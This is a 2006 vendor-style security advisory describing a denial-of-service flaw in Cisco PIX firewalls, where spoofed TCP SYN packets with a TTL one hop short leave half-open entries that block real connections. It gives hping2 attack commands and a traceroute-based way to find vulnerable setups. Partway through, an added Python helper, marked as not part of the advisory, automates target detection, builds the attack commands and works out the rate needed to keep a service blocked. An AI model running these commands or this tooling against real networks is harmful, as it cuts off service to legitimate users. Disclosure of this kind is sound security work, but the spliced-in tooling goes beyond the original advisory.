Arhont Ltd - Information Security

Arhont Advisory by: Konstantin V. Gavrilenko (http://www.arhont.com)
http://www.hackingciscoexposed.com
Arhont ref: arh200511-1

Advisory: Cisco PIX embryonic state machine TTL(n-1) DoS
Class: design bug?
Version: Tested on PIX535, PIX OS ver 6.3(4)
         Tested on PIX515E, PIX OS ver 7.0(4)
Model Specific: Other versions might have the same bug

DETAILS

Further to the advisory from Arhont Information Security released on 22/11/2005, named "Cisco PIX TCP Connection Prevention", I would like to report that it is possible to perform an additional DoS attack using the same flaw in the PIX embryonic connection mechanism, this time from the outside interface.

It is possible to prevent new connection establishment to a specific port on a server located behind the PIX firewall when a permanent static mapping is applied between a local and a global IP address, as in the network setup below.

Network Setup

Attacker ------ Internet ------ PIX ------ Router ------ Server

By sending a legitimate packet (a TCP SYN) with a TTL equal to n-1, where n is the hop count to the destination, it is possible to block new connections between that source port and destination port pair for approximately 120 seconds on PIX OS version 6 and 30 seconds on PIX OS version 7. For the attack to succeed, an additional hop (a router) must be present between the PIX and the server: the PIX accepts the SYN and creates an embryonic (half-open) connection entry for it, the router expires the packet and returns an ICMP time exceeded in-transit message, and the embryonic entry remains in the PIX state table until its timeout, so a genuine SYN with the same source address, source port and destination port is not passed during that window.

Such setups are easy to identify with tcptraceroute to the open port: the destination IP address is repeated in the last two hops, e.g.
tcptraceroute output (addresses redacted):

 5  xxx.xxx.xxx.32   18.952 ms   19.396 ms  20.438 ms
 6  xxx.xxx.xxx.7    19.667 ms   22.174 ms  20.629 ms
 7  xxx.xxx.xxx.68   29.286 ms   21.401 ms  19.935 ms
 8  xxx.xxx.xxx.100  108.143 ms  42.783 ms  *
 9  xxx.xxx.xxx.100 [open]  32.268 ms  26.037 ms  23.569 ms

Here the destination answers at hop 9 and the same address already appears at hop 8, so a packet sent with TTL 8 expires on the router behind the PIX.

Although it would take a lot of packets to disrupt communication between two hosts completely, we assume that the attacker's aim is to prevent communication between a specific service on the machine behind the PIX firewall (e.g. HTTP/S, SMTP) and some other host on the Internet whose source address can be spoofed. Depending on the bandwidth available, it might take as little as 15 seconds to generate and send 65535 packets, one per source port.

The attack can be performed with an interactive packet constructor such as hping. To prevent new connection establishment between SOURCE_IP source port 31337 and TARGET_IP destination port 80 (with -t 8 being the n-1 TTL taken from the trace above), execute:

arhontus / # hping2 -a $SOURCE_IP -S -c 1 -s 31337 -p 80 -t 8 $TARGET_IP

To prevent new connection establishment between SOURCE_IP source ports 0-65535 and TARGET_IP destination port 80 (hping2 increments the source port with every packet sent), execute:

arhontus / # hping2 -a $SOURCE_IP -S -s 0 -p 80 --faster -t 8 $TARGET_IP

The attack was tested on two PIX 535 firewalls with 1 GB of RAM each, performing static permanent mapping and running in failover mode with PIX OS ver 6.3(4), and on a single PIX 515E with 64 MB of RAM running PIX OS ver 7.0(4).

RISK FACTOR: Medium

WORKAROUNDS: PSIRT response with workarounds to follow this disclosure

COMMUNICATION HISTORY

Issue discovered: 04/11/2005
PSIRT notified: 24/01/2006
Public disclosure: 07/03/2006

ADDITIONAL INFORMATION:

*According to the Arhont Ltd. policy, all of the found vulnerabilities and security issues will be reported to the manufacturer at least 7 days before releasing them to the public domains (such as CERT and BUGTRAQ).
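The reconnaissance and packet-construction steps described above, as an added example that is not part of the advisory: a Python helper that parses tcptraceroute output for the repeated-destination pattern, derives the n-1 TTL, builds the equivalent hping2 command line, and estimates the packet rate needed to keep the whole source-port range blocked across the observed timeout. The sample trace and the 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 addresses are constructed (RFC 5737 documentation ranges), not hosts from the advisory; the script only builds the command string and sends no packets.

```python
import re

# Constructed sample tcptraceroute output in the shape the advisory describes:
# the destination address appears in the last two hops because the router
# between the PIX and the server expires the probe one hop early. Addresses
# are RFC 5737 documentation ranges, not hosts from the advisory.
SAMPLE_TRACE = """\
 5  203.0.113.32     18.952 ms  19.396 ms  20.438 ms
 6  203.0.113.7      19.667 ms  22.174 ms  20.629 ms
 7  203.0.113.68     29.286 ms  21.401 ms  19.935 ms
 8  198.51.100.100  108.143 ms  42.783 ms  *
 9  198.51.100.100 [open]  32.268 ms  26.037 ms  23.569 ms
"""

# hop number, responding address ('*' when every probe timed out), and the
# optional [open] marker tcptraceroute prints when the target port answers
HOP_RE = re.compile(r"^\s*(\d+)\s+(\S+)(\s+\[open\])?", re.M)


def parse_hops(trace):
    """Return [(hop, address, port_open), ...] from tcptraceroute output."""
    return [(int(n), addr, bool(mark)) for n, addr, mark in HOP_RE.findall(trace)]


def vulnerable_ttl(trace):
    """Return the TTL at which a probe expires on the router behind the PIX,
    i.e. n-1 where n is the hop that reports the port open, or None when the
    trace does not show the destination address repeated in the last two hops."""
    hops = parse_hops(trace)
    if len(hops) < 2:
        return None
    last_hop, last_addr, port_open = hops[-1]
    prev_hop, prev_addr, _ = hops[-2]
    if port_open and prev_addr == last_addr and prev_hop == last_hop - 1:
        return prev_hop
    return None


def hping_command(src_ip, dst_ip, ttl, dst_port, src_port=None):
    """Build the hping2 invocation from the advisory. With src_port given, a
    single SYN for that source port; without it, sweep the source-port range
    starting at 0 (hping2 increments the source port on every packet)."""
    if src_port is not None:
        return (f"hping2 -a {src_ip} -S -c 1 -s {src_port} -p {dst_port} "
                f"-t {ttl} {dst_ip}")
    return f"hping2 -a {src_ip} -S -s 0 -p {dst_port} --faster -t {ttl} {dst_ip}"


def sustain_pps(timeout_seconds, ports=65536):
    """Average packets per second needed to re-send every source port once per
    embryonic timeout (assumption: the block must be re-established each time
    the entry expires), i.e. to keep the whole range blocked continuously."""
    return ports / timeout_seconds


if __name__ == "__main__":
    ttl = vulnerable_ttl(SAMPLE_TRACE)
    print("n-1 TTL:", ttl)
    print(hping_command("192.0.2.10", "198.51.100.100", ttl, 80, 31337))
    print(hping_command("192.0.2.10", "198.51.100.100", ttl, 80))
    for version, t in (("PIX OS 6", 120), ("PIX OS 7", 30)):
        print(f"{version}: {sustain_pps(t):.0f} pps to keep all source ports blocked")
```

The sustained-rate figure is the practical caveat behind the advisory's "15 seconds for 65535 packets": a single burst blocks each source port only for one timeout window, so holding a service unreachable from a spoofed peer means repeating the sweep roughly every 120 s on PIX OS 6 and every 30 s on PIX OS 7.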
If you would like more information about this issue, please do not hesitate to contact the Arhont team on info@xxxxxxxxxx

--
Respectfully,
Konstantin V. Gavrilenko
Arhont Ltd - Information Security
web: http://www.arhont.com
     http://www.wi-foo.com
e-mail: k.gavrilenko@xxxxxxxxxx
tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141
PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com